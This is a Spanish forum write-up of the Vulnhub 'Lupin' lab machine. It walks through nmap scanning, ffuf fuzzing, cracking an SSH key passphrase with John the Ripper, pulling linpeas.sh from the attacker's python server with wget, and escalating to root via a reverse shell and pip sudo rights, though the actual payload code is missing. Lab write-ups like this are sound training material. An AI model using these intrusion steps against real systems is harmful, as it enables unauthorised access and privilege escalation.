WriteUp - Lupin (Vulnhub)

4NTR4xX · Julio 13, 2024, 01:47:13 PM

Lupin - Vulnhub

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

**ESCANEO DE PUERTOS CON NMAP**

ºnmap -n -sn 192.168.1.0/24 -oG - | awk '/Up$/{print $2}

** Este comando nos permite conocer todos los host activos dentro de una red, para poder recopilar mas informacion dentro de una prueba de pentesting

ºsudo nmap -p- --open -sC -sV -Pn -n -sS -T4 192.168.1.72 -o escaneo_de_puertos

** A través del escaneo encontramos dos puertos abiertos, el 22 y el 80. En el puerto 80 encontramos un directorio llamado "~myfiles", aquí podemos encontrar nuestro vector de ataque.

**FUERZA BRUTA PARA DIRECTORIOS WEB (FUZZING)**

º Para poder buscar mas directorios en la pagina web utilizaremos la herramienta **ffuf**, esta herramienta nos permite hacer ataques de fuerza bruta ante algún sitio web para poder encontrar directorios escondidos, ataque también conocido como Fuzzing.

** ffuf -c -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/common.txt -u 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

** Hemos descubierto un directorio que se denomina "secret", lo buscamos en el navegador para ver su contenido

- Comenta el usuario icex64 que hay otro directorio oculto, asi que procederemos a realizar un ataque fuerza bruta nuevamente con la informacion ya obtenida, con el fin de encontrar un fichero.

**ffuf -c -ic -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login; -fc 403 -e .txt, .html

** Nos dirigimos al archivo "mysecret.txt"

** Encontramos algo con caracteres extraños, vamos a una página que nos puede ayudar a desencriptar el este archivo.
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, aquí nos indica que tipo de cifrado tiene, y nos manda que es un base 58, y nos manda una llave RSA nuevamente cifrada para autenticarnos por ssh (Puerto 22).

**ATAQUE DICCIONARIO**

º Guardaremos la llave en un archivo porque vamos a hacerle un ataque diccionario a la llave para saber cual es la contraseña, y poder loguearnos por **ssh**
º Para poder descifrarla tenemos que convertir a llave a un formato que John The Ripper pueda descifrar, ejecutaremos el comando en nuestra terminal "locate ssh2john", para conocer la ruta de la herramienta que usaremos para poder convertir esta llave.

º Para poder usarla nos ubicaremos en en directorio donde hayamos guardado la llave ssh y ejecutamos el siguiente comando:

** Hash es el nombre del archivo que guardamos y "sshkey" es el nombre del archivo con el que guardaremos la respuesta de la herramienta.

º Ahora si procedemos a usar "John The Ripper" contra el archivo cifrado.

** En este caso usaremos el diccionario llamado "fasttrack.txt"

º De esa manera pudimos encontrar la contraseña y ahora si, podemos autenticarnos por ssh con el usuario icex64

** No olvidemos agregar la clave RSA llamado "Hash" (en este caso) para que tengamos una correcta autenticación

º Ya habiéndonos autenticándonos hacemos un listado con el comando "ls" y encontramos la primer bandera.

**ELEVAR PRIVILEGIOS**

º Ya estando dentro de la maquina procederemos a tratar de elevar privilegios a root, para eso miraremos que alcance tenemos con el comando "sudo -l"

** Procederemos a trata de aprovechar esa propiedad para ello descargaremos el primer archivo de la siguiente pagina.

- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

- Este archivo nos ayudara a encontrar vulnerabilidades dentro de la maquina en archivo que podamos ejecutar, ahora ya descargando el archivo moveremos a la maquina atacada, para ello abriremos un servidor desde nuestra maquina atacante en python para poder descargar el archivo desde la otra maquina, para ello ejecutaremos el siguiente comando:
- sudo python3 -m http.server

- Es importante ejecutar el comando en donde hayamos guardado el archivo descargado
- Desde la maquina atacada tendremos que descargar el arvhico dentro de la carpeta /temp, para descargarlo ejecutaremos el siguiente comando:
- wget 192.168.1.70:8000/linpeas.sh (Por el puerto 8000 porque en ese esta corriendo el servidor)

-Habiendo cargado el archivo para poder ejecutarlo tenemos que darle los permisos que necesita con el comando "chmod 777 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login", despues lo ejecutamos con el comando "./linpeas.sh"

- Habiendo hecho esto pudimos encontrar un directorio que esta dentro de las opciones que nos dio la maquina al ejecutar sudo -l

- Para poder aprovechar la vulnerabilidad editaremos el archivo con nano, y al final le pondremos el siguiente codigo para poder obtener una reverse shell

(Esto va al principio del código)

(Esto va al final del código)

- Guardamos el archivo, y ejecutamos de la siguiente manera:

- Al ejecutar esto nos cambia de usuario a "arsene"
- Al estar como "arsene" y ejecuando el comando 'sudo -l' encontramos que tenemos pip para poder elevar a usuario root

- Desde ahí podemos vulnerar para poder acceder como root, para ellos nos iremos a la siguiente pagina `You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Ahí podremos encontrar los comandos que necesitamos para explotar esa vulnerabilidad

- Los ejecutamos en nuestra terminal y pasaremos a ser usuarios root

PWNED!!!!!!

WriteUp - Lupin (Vulnhub)

4NTR4xX

Julio 13, 2024, 01:47:13 PM Ultima modificación: Julio 13, 2024, 03:46:30 PM por AXCESS